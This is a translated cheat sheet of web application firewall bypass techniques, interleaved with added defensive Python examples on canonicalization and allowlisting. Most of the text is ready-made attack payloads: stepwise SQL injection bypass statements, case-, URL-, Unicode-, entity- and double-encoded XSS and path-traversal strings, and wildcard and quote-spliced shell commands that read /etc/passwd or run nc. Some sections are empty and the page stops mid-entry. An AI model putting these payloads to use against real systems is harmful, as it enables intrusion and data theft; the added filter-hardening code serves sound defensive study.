Notes on various WAF bypass techniques

Original article: https://mp.weixin.qq.com/s/aeRi1lRnKcs_N2JLcZZ0Gg

0X00    Fuzzing / brute forcing

Fuzzing dictionaries

1.Seclists/Fuzzing

https://github.com/danielmiessler/SecLists/tree/master/Fuzzing

2.Fuzz-DB/Attack

https://github.com/fuzzdb-project/fuzzdb/tree/master/attack

3.Other Payloads: these can get your IP banned, so be careful.

https://github.com/foospidy/payloads

0X01    Regex bypass

A good many WAFs rely on regular-expression matching.

Blacklist detection / bypass

Case: SQL injection

• Step 1:
Filtered keywords: and, or, union
Likely regex: preg_match('/(and|or|union)/i', $id)
Blocked statement: union select user, password from users

Bypass statement: 1 || (select user from users where user_id = 1) = 'admin'

• Step 2:

Filtered keywords: and, or, union, where
Blocked statement: 1 || (select user from users where user_id = 1) = 'admin'

Bypass statement: 1 || (select user from users limit 1) = 'admin'

• Step 3:

Filtered keywords: and, or, union, where, limit
Blocked statement: 1 || (select user from users limit 1) = 'admin'

Bypass statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

• Step 4:

Filtered keywords: and, or, union, where, limit, group by
Blocked statement: 1 || (select user from users group by user_id having user_id = 1) = 'admin'

Bypass statement: 1 || (select substr(group_concat(user_id),1,1) user from users ) = 1

• Step 5:

Filtered keywords: and, or, union, where, limit, group by, select

Blocked statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1

Bypass statement: 1 || 1 = into outfile 'result.txt'
Bypass statement: 1 || substr(user,1,1) = 'a'

• Step 6:

Filtered keywords: and, or, union, where, limit, group by, select, '

Blocked statement: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1

Bypass statement: 1 || user_id is not null
Bypass statement: 1 || substr(user,1,1) = 0x61
Bypass statement: 1 || substr(user,1,1) = unhex(61)

• Step 7:

Filtered keywords: and, or, union, where, limit, group by, select, ', hex
Blocked statement: 1 || substr(user,1,1) = unhex(61)

Bypass statement: 1 || substr(user,1,1) = lower(conv(11,10,36))

• Step 8:

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr
Blocked statement: 1 || substr(user,1,1) = lower(conv(11,10,36))

Bypass statement: 1 || lpad(user,7,1)

• Step 9:

Filtered keywords: and, or, union, where, limit, group by, select, ', hex, substr, white space
Blocked statement: 1 || lpad(user,7,1)

Bypass statement: 1%0b||%0blpad(user,7,1)
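The defender's reading of steps 1 to 9, as an added example that is not part of the original article: a Python reconstruction of the blacklist (the step 1 regex as given, step 9 with a whitespace check that only knows space, tab, CR and LF) run over the page's own bypass statements, next to the two controls that actually close the hole: control-character normalization before matching, and an integer allowlist with the value bound as a query parameter. The rule names, the `users` table and the id values are constructed for the demo.

```python
import re
import sqlite3
from urllib.parse import unquote

# Blacklist rules modelled on the steps above (hypothetical WAF configuration).
# STEP1_RULE is the page's preg_match('/(and|or|union)/i', $id); STEP9_RULE is
# the full keyword list plus a "white space" check that only knows the four
# usual characters, which is exactly what lets the %0b (vertical tab) variant in.
STEP1_RULE = re.compile(r"(and|or|union)", re.I)
STEP9_RULE = re.compile(
    r"(and|or|union|where|limit|group[ \t]*by|select|'|hex|substr|[ \t\r\n])", re.I)

# Sample input: the bypass statements from steps 1-9, collected here for the demo.
PAGE_BYPASSES = [
    "1 || (select user from users where user_id = 1) = 'admin'",
    "1 || (select user from users limit 1) = 'admin'",
    "1 || (select user from users group by user_id having user_id = 1) = 'admin'",
    "1 || (select substr(group_concat(user_id),1,1) user from users ) = 1",
    "1 || substr(user,1,1) = 0x61",
    "1 || substr(user,1,1) = lower(conv(11,10,36))",
    "1 || lpad(user,7,1)",
    "1%0b||%0blpad(user,7,1)",
]


def blacklist_allows(rule, decoded):
    """The page's filter: accept the parameter unless some keyword matches."""
    return rule.search(decoded) is None


def normalize(raw):
    """Canonicalise before matching: percent-decode, then fold every ASCII control
    character (vertical tab, form feed, ...) and NBSP into a plain space."""
    return re.sub(r"[\x00-\x1f\x7f\xa0]", " ", unquote(raw))


def allowlist_id(raw):
    """Positive validation: the id parameter is a short decimal integer, nothing else."""
    return re.fullmatch(r"[0-9]{1,9}", unquote(raw)) is not None


def lookup_user(conn, raw_id):
    """Validate, then bind the value; the driver treats it as data, never as SQL."""
    if not allowlist_id(raw_id):
        return None
    row = conn.execute("SELECT user FROM users WHERE user_id = ?",
                       (int(raw_id),)).fetchone()
    return row[0] if row else None


def evaluate():
    """How many of the page's payloads each defence lets through."""
    return {
        "step1_blacklist": sum(blacklist_allows(STEP1_RULE, unquote(p)) for p in PAGE_BYPASSES),
        "step9_blacklist": sum(blacklist_allows(STEP9_RULE, unquote(p)) for p in PAGE_BYPASSES),
        "step9_normalized": sum(blacklist_allows(STEP9_RULE, normalize(p)) for p in PAGE_BYPASSES),
        "allowlist": sum(allowlist_id(p) for p in PAGE_BYPASSES),
    }


def demo_db():
    """Constructed in-memory users table for the parameterised lookup."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users(user_id INTEGER PRIMARY KEY, user TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [(1, "admin"), (2, "bob"), (42, "carol")])
    return conn


if __name__ == "__main__":
    print(evaluate())
    db = demo_db()
    print(lookup_user(db, "42"), lookup_user(db, "1%0b||%0blpad(user,7,1)"))
```

The step 1 rule passes all eight statements and the step 9 rule still passes the vertical-tab one; normalizing control characters to spaces before matching closes that specific gap, but only the allowlist rejects every statement, because it describes what the parameter may be instead of enumerating what it may not contain.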


0X02    Obfuscation / encoding

1. Case variation

Standard: <script>alert()</script>
Bypassed: <ScRipT>alert()</sCRipT>

Standard: SELECT * FROM all_tables WHERE OWNER = 'DATABASE_NAME'
Bypassed: sELecT * FrOm all_tables whERe OWNER = 'DATABASE_NAME'

2. URL encoding

Blocked statement: <svG/x=">"/oNloaD=confirm()//
Bypassed: %3CsvG%2Fx%3D%22%3E%22%2FoNloaD%3Dconfirm%28%29%2F%2F

Blocked statement: uNIoN(sEleCT 1,2,3,4,5,6,7,8,9,10,11,12)
Bypassed: uNIoN%28sEleCT+1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%29

3. Unicode encoding

Standard: 
Obfuscated:

Blocked statement: /?redir=http://google.com
Bypassed: /?redir=http://google。com (Unicode substitution)

Blocked statement: <marquee loop=1 onfinish=alert()>x
Bypassed: <marquee loop=1 onfinish=alert︵1)>x (Unicode substitution)

TIP: see this and this report on HackerOne. :)

4. HTML entity encoding

Standard: "><img src=x onerror=confirm()>
Encoded: &quot;&gt;&lt;img src=x onerror=confirm()&gt; (General form)
Encoded: &#34;&#62;&#60;img src=x onerror=confirm()&#62; (Numeric reference)

5. Mixed encoding

WAF rules often filter only one specific type of encoding.

Such filters can be bypassed by mixing encodings within one payload.

Tabs and newlines add further obfuscation.

Obfuscated:

<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

7. Double URL encoding

This works when the server side URL-decodes the input more than once.

Standard: http://victim/cgi/../../winnt/system32/cmd.exe?/c+dir+c:\
Obfuscated: http://victim/cgi/%252E%252E%252F%252E%252E%252Fwinnt/system32/cmd.exe?/c+dir+c:\

Standard: <script>alert()</script>
Obfuscated: %253Cscript%253Ealert()%253C%252Fscript%253E
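Added example, not from the original article, covering items 1 to 5 and 7 above: the canonicalization pass a filter has to run before any regex is worth applying (bounded repeated percent-decoding, HTML entity decoding, NFKC folding, control-character stripping, lower-casing), plus IDNA host normalization for the Unicode-dot redirect case. The inputs are the page's own obfuscated payloads; the entity-encoded `img` line, the allowed-host set and the two detection regexes are constructed assumptions.

```python
import html
import re
import unicodedata
from urllib.parse import unquote_plus, urlsplit

# Two rounds undo double URL encoding; the bound stops a decoder from looping on
# input that keeps producing new percent sequences.
MAX_DECODE_ROUNDS = 3


def canonicalize(raw):
    """Undo the obfuscations from items 1-5 and 7 so that one lower-case rule can match."""
    s = raw
    # items 2 and 7: percent-decode (query-string semantics, '+' is a space) until stable
    for _ in range(MAX_DECODE_ROUNDS):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    # item 4: named and numeric HTML entities
    s = html.unescape(s)
    # item 3: compatibility characters such as U+FE35 "︵" fold to ASCII "("
    s = unicodedata.normalize("NFKC", s)
    # item 5: tabs, newlines and other control characters browsers ignore inside tokens
    s = re.sub(r"[\x00-\x1f\x7f]", "", s)
    # item 1: case
    return s.lower()


# Hypothetical detection rules; they are only ever applied to canonicalized text.
HTML_INJECTION = re.compile(r"<[a-z!/]|\bon[a-z]+\s*=|javascript:")
PATH_TRAVERSAL = re.compile(r"\.\.[/\\]")


def looks_like_html_injection(raw):
    return HTML_INJECTION.search(canonicalize(raw)) is not None


def looks_like_traversal(raw):
    return PATH_TRAVERSAL.search(canonicalize(raw)) is not None


def normalize_host(host):
    """IDNA-encode so Unicode label separators such as U+3002 become '.'; None if invalid."""
    try:
        return host.encode("idna").decode("ascii").lower()
    except UnicodeError:
        return None


def is_allowed_redirect(target, allowed_hosts):
    """Open-redirect check: relative paths are fine, anything with a host must be on
    the allowlist after normalization (protocol-relative '//host' counts as a host)."""
    parts = urlsplit(canonicalize(target))
    if not parts.netloc:
        return parts.scheme == "" and parts.path.startswith("/")
    return normalize_host(parts.hostname or "") in allowed_hosts


if __name__ == "__main__":
    for sample in ("<ScRipT>alert()</sCRipT>",
                   "%253Cscript%253Ealert()%253C%252Fscript%253E",
                   "<marquee loop=1 onfinish=alert︵1)>x"):
        print(repr(canonicalize(sample)), looks_like_html_injection(sample))
    print(is_allowed_redirect("http://google。com", {"example.com"}))
```

The order matters: percent-decoding comes first because the other encodings may be wrapped inside it, and the rule set is written once, in lower case, against the canonical form rather than once per encoding variant.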

8. Wildcards

Used for Linux command injection: shell wildcards stand in for the filtered characters.

Standard: /bin/cat /etc/passwd
Obfuscated: /???/??t /???/??ss??
Used chars: / ? t s

Standard: /bin/nc 127.0.0.1 1337
Obfuscated: /???/n? 2130706433 1337
Used chars: / ? n [0-9]

9. Dynamic payload generation

Standard: <script>alert()</script>
Obfuscated: <script>eval('al'+'er'+'t()')</script>

Standard: /bin/cat /etc/passwd
Obfuscated: /bi'n'''/c''at' /e'tc'/pa''ss'wd

Bash allows path concatenation for execution.
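Added example for items 8 and 9, not the article's code: a hypothetical "ping the host the user names" endpoint showing why a keyword blacklist on the command string cannot see `/???/??t` or the quote-spliced form, what `shlex` reveals once POSIX quoting is resolved (the quoted form collapses to the words the shell would execute, while the wildcard form still hides), and the fix of allowlisting the parameter and passing it as its own argv element with no shell. The hostname regex, the blacklist and the `ping` command line are assumptions.

```python
import re
import shlex
import subprocess

# The kind of rule the wildcard and quote-splicing tricks above are built to slip past.
COMMAND_BLACKLIST = re.compile(r"\b(cat|nc|passwd|sh|bash)\b", re.I)

# Allowlist for the one thing the parameter may be: a DNS hostname or dotted IPv4.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?:\.[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?)*$", re.I)

# The obfuscated commands from items 8 and 9, collected here as sample input.
PAGE_COMMANDS = [
    "/???/??t /???/??ss??",
    "/???/n? 2130706433 1337",
    "/bi'n'''/c''at' /e'tc'/pa''ss'wd",
]


def blacklist_blocks(cmd):
    """Keyword rule on the raw string: what a naive filter sees."""
    return COMMAND_BLACKLIST.search(cmd) is not None


def resolve_quoting(cmd):
    """Resolve POSIX shell quoting with shlex so the quote-spliced form reads as the
    words the shell would hand to execve; wildcards are untouched, shlex does not glob."""
    try:
        return " ".join(shlex.split(cmd))
    except ValueError:  # unbalanced quotes: match against the raw text instead
        return cmd


def build_argv(host):
    """Validate the parameter, then give it its own argv slot. With no shell involved,
    '?', '*', quotes and ';' inside the value are never interpreted."""
    if not HOSTNAME.match(host):
        raise ValueError("parameter is not a hostname")
    return ["ping", "-c", "1", host]


def accepts_host(host):
    try:
        build_argv(host)
        return True
    except ValueError:
        return False


def run_ping(host):
    """The only place the command is executed: argv list, shell=False."""
    return subprocess.run(build_argv(host), shell=False,
                          capture_output=True, text=True, timeout=10)


def evaluate():
    """Per page command: does the raw blacklist fire, does it fire after quoting is
    resolved, and would the allowlist ever accept the value."""
    return {
        "raw_blacklist_blocks": [blacklist_blocks(c) for c in PAGE_COMMANDS],
        "after_quote_resolution": [blacklist_blocks(resolve_quoting(c)) for c in PAGE_COMMANDS],
        "allowlist_accepts": [accepts_host(c) for c in PAGE_COMMANDS],
    }


if __name__ == "__main__":
    print(evaluate())
    print(resolve_quoting(PAGE_COMMANDS[2]))
```

Quote resolution exposes the spliced `/bin/cat /etc/passwd`, but the wildcard forms only take on a meaning when a shell expands them against the real filesystem, which no string rule can predict; not invoking a shell at all, and accepting only values that match what the parameter is supposed to be, is the control that holds for both.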

Standard: